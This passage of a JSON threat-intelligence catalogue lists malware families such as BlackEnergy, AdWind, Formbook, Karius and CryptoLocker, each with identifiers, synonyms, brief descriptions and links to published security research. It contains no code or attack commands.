"synonyms": [
"DexLocker"
],
"type": [],
"refs": [
"http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/",
"https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100",
"https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d"
]
}
},
{
"uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
"value": "Erebus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
]
}
},
{
"uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295",
"value": "Sword",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
"value": "BlackEnergy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
"https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
"https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
]
}
},
{
"uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
"value": "AdWind",
"description": "",
"meta": {
"synonyms": [
"JBifrost",
"JSocket",
"AlienSpy",
"UNRECOM",
"Frutas"
],
"type": [],
"refs": [
"https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/",
"http://malware-traffic-analysis.net/2017/07/04/index.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
"https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
]
}
},
{
"uuid": "84b30881-00bc-4206-8170-51705a8e26b1",
"value": "HideDRV",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf"
]
}
},
{
"uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
"value": "Formbook",
"description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
"http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
"http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html",
"https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
"https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
"http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
"https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
]
}
},
{
"uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3",
"value": "MPK",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f",
"value": "9002 RAT",
"description": "",
"meta": {
"synonyms": [
"McRAT",
"Hydraq"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
"https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315",
"http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
"https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
"https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures"
]
}
},
{
"uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996",
"value": "PetrWrap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/"
]
}
},
{
"uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311",
"value": "Buterat",
"description": "",
"meta": {
"synonyms": [
"spyvoltar"
],
"type": [],
"refs": [
"http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html"
]
}
},
{
"uuid": "e26579d9-1d93-4a3b-a41e-263254d85189",
"value": "EvilPony",
"description": "Privately modded version of the Pony stealer.",
"meta": {
"synonyms": [
"CREstealer"
],
"type": [],
"refs": [
"https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/",
"https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware",
"https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/"
]
}
},
{
"uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786",
"value": "KeRanger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html",
"http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/"
]
}
},
{
"uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126",
"value": "Troldesh",
"description": "",
"meta": {
"synonyms": [
"Shade"
],
"type": [],
"refs": [
"https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
"https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/"
]
}
},
{
"uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
"value": "KHRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
"https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor"
]
}
},
{
"uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d",
"value": "Mocton",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98",
"value": "Stantinko",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
]
}
},
{
"uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06",
"value": "Ransoc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles"
]
}
},
{
"uuid": "dd1408ac-e288-4389-87f3-7650706f1d51",
"value": "NexusLogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/",
"https://twitter.com/PhysicalDrive0/status/842853292124360706"
]
}
},
{
"uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
"value": "Decebal",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157",
"https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
"https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
]
}
},
{
"uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144",
"value": "TinyLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0"
]
}
},
{
"uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9",
"value": "Cobra Carbon System",
"description": "",
"meta": {
"synonyms": [
"Carbon"
],
"type": [],
"refs": [
"https://github.com/hfiref0x/TDL",
"https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
"https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
"https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
"https://securelist.com/analysis/publications/65545/the-epic-turla-operation/"
]
}
},
{
"uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39",
"value": "HiddenLotus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/"
]
}
},
{
"uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460",
"value": "Umbreon",
"description": "",
"meta": {
"synonyms": [
"Espeon"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/",
"http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html"
]
}
},
{
"uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
"value": "Batel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2",
"value": "Locky Loader",
"description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
"value": "ZXShell",
"description": "",
"meta": {
"synonyms": [
"Sensocode"
],
"type": [],
"refs": [
"https://github.com/smb01/zxshell",
"https://blogs.cisco.com/security/talos/opening-zxshell",
"https://blogs.rsa.com/cat-phishing/"
]
}
},
{
"uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe",
"value": "MacVX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228",
"value": "sykipot",
"description": "",
"meta": {
"synonyms": [
"getkys"
],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/sykipot-is-back",
"https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/",
"https://community.rsa.com/thread/185437",
"https://www.symantec.com/connect/blogs/sykipot-attacks"
]
}
},
{
"uuid": "0777cb30-534f-44bb-a7af-906a422bd624",
"value": "StealthAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
]
}
},
{
"uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
"value": "Upatre",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
"https://secrary.com/ReversingMalware/Upatre/"
]
}
},
{
"uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e",
"value": "Hamweq",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf"
]
}
},
{
"uuid": "42562c47-08e1-46bc-962c-28d1831d092b",
"value": "NetSupportManager RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.netsupportmanager.com/index.asp",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
"https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/"
]
}
},
{
"uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
"value": "Jolob",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html"
]
}
},
{
"uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
"value": "WebC2-GreenCat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
"value": "Karius",
"description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://research.checkpoint.com/banking-trojans-development/",
"https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/"
]
}
},
{
"uuid": "d258de39-e351-47e3-b619-731c87f13d9c",
"value": "Alreay",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77908/lazarus-under-the-hood/"
]
}
},
{
"uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366",
"value": "Stresspaint",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/",
"https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/",
"https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/",
"https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/"
]
}
},
{
"uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e",
"value": "Scote",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/"
]
}
},
{
"uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af",
"value": "Equationgroup (Sorting)",
"description": "Rough collection EQGRP samples, to be sorted",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://laanwj.github.io/2016/08/28/feintcloud.html",
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
"https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html",
"https://laanwj.github.io/2016/08/22/blatsting.html",
"https://laanwj.github.io/2016/09/11/buzzdirection.html",
"https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
"https://laanwj.github.io/2016/09/01/tadaqueos.html",
"https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html"
]
}
},
{
"uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6",
"value": "CrypMic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
"https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
]
}
},
{
"uuid": "38f57823-ccc2-424b-8140-8ba30325af9c",
"value": "Rokku",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4",
"value": "Zeus Sphinx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/",
"https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/",
"https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/"
]
}
},
{
"uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49",
"value": "Locky (Decryptor)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
"value": "MimiKatz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/gentilkiwi/mimikatz",
"https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
"http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
" https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
]
}
},
{
"uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275",
"value": "win.gandcrab",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
"https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
"https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
"https://isc.sans.edu/diary/23417"
]
}
},
{
"uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4",
"value": "FakeRean",
"description": "",
"meta": {
"synonyms": [
"Braviax"
],
"type": [],
"refs": [
"https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/",
"https://0x3asecurity.wordpress.com/2015/11/30/134260124544/",
"https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf"
]
}
},
{
"uuid": "de3aae04-130b-4c5f-b67c-03f872e76697",
"value": "Nexster Bot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/benkow_/status/789006720668405760"
]
}
},
{
"uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba",
"value": "Mosquito",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
]
}
},
{
"uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4",
"value": "Moker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://breakingmalware.com/malware/moker-part-2-capabilities/",
"https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/",
"https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/",
"http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network"
]
}
},
{
"uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3",
"value": "Zeus MailSniffer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034",
"value": "FantomCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/"
]
}
},
{
"uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128",
"value": "GearInformer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.rekings.com/ispy-customers/",
"https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html"
]
}
},
{
"uuid": "009db412-762d-4256-8df9-eb213be01ffd",
"value": "SslMM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "1ab17959-6254-49af-af26-d34e87073e49",
"value": "FirstRansom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/815949909648150528"
]
}
},
{
"uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41",
"value": "BernhardPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick"
]
}
},
{
"uuid": "261fd543-60e4-470f-af28-7a9b17ba4759",
"value": "iMuler",
"description": "",
"meta": {
"synonyms": [
"Revir"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html",
"https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/"
]
}
},
{
"uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e",
"value": "Kovter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
"https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/"
]
}
},
{
"uuid": "996e73e9-b093-4987-9992-f52008e55b24",
"value": "Makadocs",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
"https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs"
]
}
},
{
"uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f",
"value": "Lethic",
"description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.malware-traffic-analysis.net/2017/11/02/index.html",
"http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
"https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/",
"http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
]
}
},
{
"uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322",
"value": "WndTest",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947",
"value": "Unidentified 034",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/"
]
}
},
{
"uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8",
"value": "Siggen6",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56",
"value": "ComradeCircle",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/816926371867926528"
]
}
},
{
"uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5",
"value": "Goodor",
"description": "",
"meta": {
"synonyms": [
"Fuerboos"
],
"type": [],
"refs": [
"https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
]
}
},
{
"uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49",
"value": "Tofsee",
"description": "",
"meta": {
"synonyms": [
"Gheg"
],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/tofsee-en/",
"https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/"
]
}
},
{
"uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d",
"value": "AdultSwine",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/"
]
}
},
{
"uuid": "c931dc7d-9373-4545-911c-ad5589670c40",
"value": "Morto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html",
"https://www.f-secure.com/weblog/archives/00002227.html",
"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A"
]
}
},
{
"uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce",
"value": "KrBanker",
"description": "",
"meta": {
"synonyms": [
"BlackMoon"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
"https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
"https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
"http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf"
]
}
},
{
"uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5",
"value": "WireLurker",
"description": "The iOS malware that is installed over USB by osx.wirelurker",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
]
}
},
{
"uuid": "3556df83-9772-40c7-b418-dc4a67b9c54f",
"value": "Unidentified 043",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "66b1094f-7779-43ad-a32b-a9414babcc76",
"value": "Szribi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
"https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
"https://www.secureworks.com/research/srizbi"
]
}
},
{
"uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7",
"value": "CryptoLocker",
"description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
"https://www.secureworks.com/research/cryptolocker-ransomware"
]
}
},
{
"uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
"value": "WebC2-AdSpace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "982c3554-1df2-4062-8f32-f311940ad9ff",
"value": "TemptingCedar Spyware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware"
]
}
},
{
"uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c",
"value": "Cloud Duke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002822.html"
]
}
},
{
"uuid": "94323b32-9566-450b-8480-5f9f53b57948",
"value": "taidoor",
"description": "",
"meta": {
"synonyms": [
"simbot"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
"https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
"http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html"
]
}
},
{
"uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833",
"value": "Tsifiri",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa",
"value": "CyberSplitter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "feb6a5f6-32f9-447d-af9c-08e499457883",
"value": "Trump Bot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://paper.seebug.org/345/"
]
}
},
{
"uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0",
"value": "Carberp",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "f43a0e38-2394-4538-a123-4a0457096058",
"value": "Unidentified 025 (Clickfraud)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2016/05/09/index.html"
]
}
},
{
"uuid": "db755407-4135-414c-90e3-97f5e48c6065",
"value": "Winsloader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf",
"value": "Pteranodon",
"description": "",
"meta": {
